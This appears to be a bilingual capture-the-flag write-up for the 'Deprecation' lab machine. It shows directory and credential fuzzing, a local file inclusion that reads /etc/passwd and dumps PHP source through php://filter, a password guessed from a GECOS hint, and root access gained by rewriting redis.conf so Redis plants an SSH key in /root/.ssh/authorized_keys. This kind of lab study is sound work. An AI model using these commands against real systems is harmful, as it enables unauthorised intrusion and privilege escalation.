mazesec deprecation
枚举
初始扫描发现目标仅开放了常规 Web 端口。
# 必须使用 -x 指定后缀,否则 Gobuster 默认只找目录
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bak发现关键端点:
- /index.php (登录页面)
- /reg.php (注册页面,存在密码防重用枚举逻辑漏洞)
- /config.php (后端配置)
- /dashboard.php (登录后的控制面板)
FFUF
使用ffuf猜测密码
把在 Burp 里抓到的原始 HTTP 请求直接复制,保存到 Kali 机器上,命名为 req.txt。
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"得到两个密码:guest123,123123
同理,使用ffuf在index.php测试账户名
ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"得到:
- guest:guest123
- test:123123
Web
登录框存在简单的防爆破机制(基于 Session 的尝试次数限制),但通过目录扫描发现了后台页面 dashboard.php。
审计代码
通过测试 dashboard.php,发现其存在 Local File Inclusion (LFI) 漏洞。
# 读取 /etc/passwd 发现高价值目标
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwd由于直接包含 PHP 文件会被解析为空白,采用 PHP 伪协议 php://filter 提取后端核心源码。
# 读取核心业务逻辑源码
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "<http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=config.php>" | base64 -d从源码中提取到两个重大情报:
- Redis 凭据泄露:index.php 中硬编码了本地 Redis 的密码:mypassword123。
- 底层函数限制:dashboard.php 使用的是 file_get_contents() 函数读取文件,而非 include()。这意味着目标不支持代码执行,传统的日志投毒 (Log Poisoning) 战术失效。
利用 (社工密码推导)
跳出反序列化陷阱,重新审视 LFI 读出的 /etc/passwd 文件,发现系统注释字段 (GECOS) 存在极其明显的提示:
shanran:x:1000:1000:shan******:/home/shanran:/bin/sh结合 config.php 源码中开发者对测试用户的设置规律:
- 账号 test -> 密码 123123
- 账号 guest -> 密码 guest123
推导公式:shanran (7位) + 123 (3位) = 10位。完美契合 shan****** 的掩码结构。
USER
使用推导出的密码直接进行 SSH 远程登录。
# 获取初始立足点 (Initial Access)
ssh shanran@192.168.0.104
# 密码: shanran123ROOT
收集系统权限信息,发现经典的服务配置错误提权漏洞。
shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
(ALL) NOPASSWD: /sbin/rc-service redis restart
(ALL) NOPASSWD: /sbin/rc-service redis stop
(ALL) NOPASSWD: /sbin/rc-service redis start检查 Redis 服务运行状态与权限:
# 1. 发现 Redis 违规以 root 身份运行
ps aux | grep redis -> root 2396 ... /usr/bin/redis-server
# 2. 发现 redis 组对主配置文件拥有写权限
ls -l /etc/redis.conf -> -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. 确认当前用户 shanran 隶属于 redis 组
id利用 (Redis 任意文件写入劫持)
利用对 /etc/redis.conf 的写权限,将 Redis 的持久化备份目录强制指向 root 用户的 SSH 信任目录,通过 Redis 将我们的 SSH 公钥注入其中。
# 1. 篡改 Redis 配置文件,接管持久化路径
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf
# 2. 以 root 权限重启 Redis 使恶意配置生效
sudo /sbin/rc-service redis restart
# 3. 登录 Redis 并注入 Kali 攻击机的 SSH 公钥
redis-cli -a mypassword123
127.0.0.1:6379> flushall
# 注意前后添加换行符,防止 RDB 二进制格式破坏公钥解析
127.0.0.1:6379> set crackit "\\n\\nssh-rsa AAAAB3Nza...[你的公钥]... kali@kali\\n\\n"
127.0.0.1:6379> save
127.0.0.1:6379> exit
# 4. SSH 免密直连 Root
ssh root@192.168.0.104mazesec Deprecation
Enumeration
The initial scan revealed that the target only opens standard web ports.
# The `-x` option must be used to specify the file extensions; otherwise, Gobuster will only search for directories by default.
gobuster dir -u http://192.168.0.104/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,bakKey endpoints were identified:
/index.php(Login page)/reg.php(Registration page, with a vulnerability related to password reuse enumeration)/config.php(Backend configuration)/dashboard.php(Control panel after login)
FFUF
Password guessing was performed using FFUF:
Copy the original HTTP requests captured in Burp and save them to the Kali machine under the name req.txt.
ffuf -request req.txt -request-proto http -w /usr/share/wordlists/rockyou.txt -fs "[]"Two passwords were obtained: guest123 and 123123.
Similarly, account names were tested using FFUF on index.php:
ffuf -request login.txt -request-proto http -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -mc "301"The following accounts were discovered:
guest:guest123test:123123
Web
The login form has a simple anti-brute-force mechanism (based on a limit on the number of attempts), but the backend page /dashboard.php was found through directory scanning.
Code Audit
Testing dashboard.php revealed a Local File Inclusion (LFI) vulnerability:
# Reading `/etc/passwd` to find valuable targets
http://192.168.0.104/dashboard.php?view=../../../../../etc/passwdSince directly including the PHP file would result in it being parsed as empty, the PHP pseudo-protocol php://filter was used to extract the core backend code.
# Extracting the core business logic code
curl -s "http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource=index.php" | base64 -d
curl -s "<http://192.168.0.104/dashboard.php?view=php://filter/read=convert.base64-encode/resource/config.php>" | base64 -dTwo important pieces of information were extracted from the code:
- Redis credentials were leaked: The local Redis password is hardcoded in
index.phpasmypassword123. - The
dashboard.phpfunction usesfile_get_contents()to read files, notinclude(). This indicates that the target does not support code execution, making traditional Log Poisoning tactics ineffective.
Exploitation (Social Engineering Password Derivation)
After escaping the deserialization trap, re-examining the /etc/passwd file revealed a clear hint in the system comment field (GECOS):
shanran:x:1000:1000:shan******:/home/shanran:/bin/shCombining this with the developer’s settings for test accounts in config.php:
- Account:
test→ Password:123123 - Account:
guest→ Password:guest123
The derivation formula is: shanran (7 characters) + 123 (3 characters) = 10 characters, which perfectly matches the mask structure of shan******.
USER
Use the derived password to perform an SSH remote login directly.
# Obtain initial access
ssh shanran@192.168.0.104
# Password: shanran123ROOT
Collect system permission information and identify a classic privilege escalation vulnerability due to incorrect service configuration.
shanran@Deprecation:~$ sudo -l
User shanran may run the following commands on Deprecation:
(ALL) NOPASSWD: /sbin/rc-service redis restart
(ALL) NOPASSWD: /sbin/rc-service redis stop
(ALL) NOPASSWD: /sbin/rc-service redis startCheck the status and permissions of the Redis service:
# 1. Redis is running under the root account, which is a violation of security policies.
ps aux | grep redis -> root 2396 ... /usr/bin/redis-server
# 2. The redis group has write permissions on the main configuration file.
ls -l /etc/redis.conf -> -rw-rw-r-- 1 root redis 325 /etc/redis.conf
# 3. Verify that the current user shanran is a member of the redis group.
idExploit the write permission on /etc/redis.conf Utilize the write permission to force Redis to use the root user’s SSH trust directory as its persistence backup directory, and inject our SSH public key into Redis.
# 1. Modify the Redis configuration file to change the persistence path.
echo 'dir /root/.ssh' > /etc/redis.conf
echo 'dbfilename authorized_keys' >> /etc/redis.conf
echo 'port 6379' >> /etc/redis.conf
echo 'requirepass mypassword123' >> /etc/redis.conf
echo 'bind 127.0.0.1' >> /etc/redis.conf2. Restart Redis with root privileges to apply the malicious configuration.
sudo /sbin/rc-service redis restart
3. Log in to Redis and inject the SSH public key from the Kali attacker’s machine.
redis-cli -a mypassword123 127.0.0.1:6379> flushall
Make sure to add line breaks before and after the key to prevent the RDB binary format from damaging the key parsing.
127.0.0.1:6379> set crackit “\n\nssh-rsa AAAAB3Nza…[your public key]… kali@kali\n\n” 127.0.0.1:6379> save 127.0.0.1:6379> exit
4. Establish an SSH connection to the root account without a password.
ssh root@192.168.0.104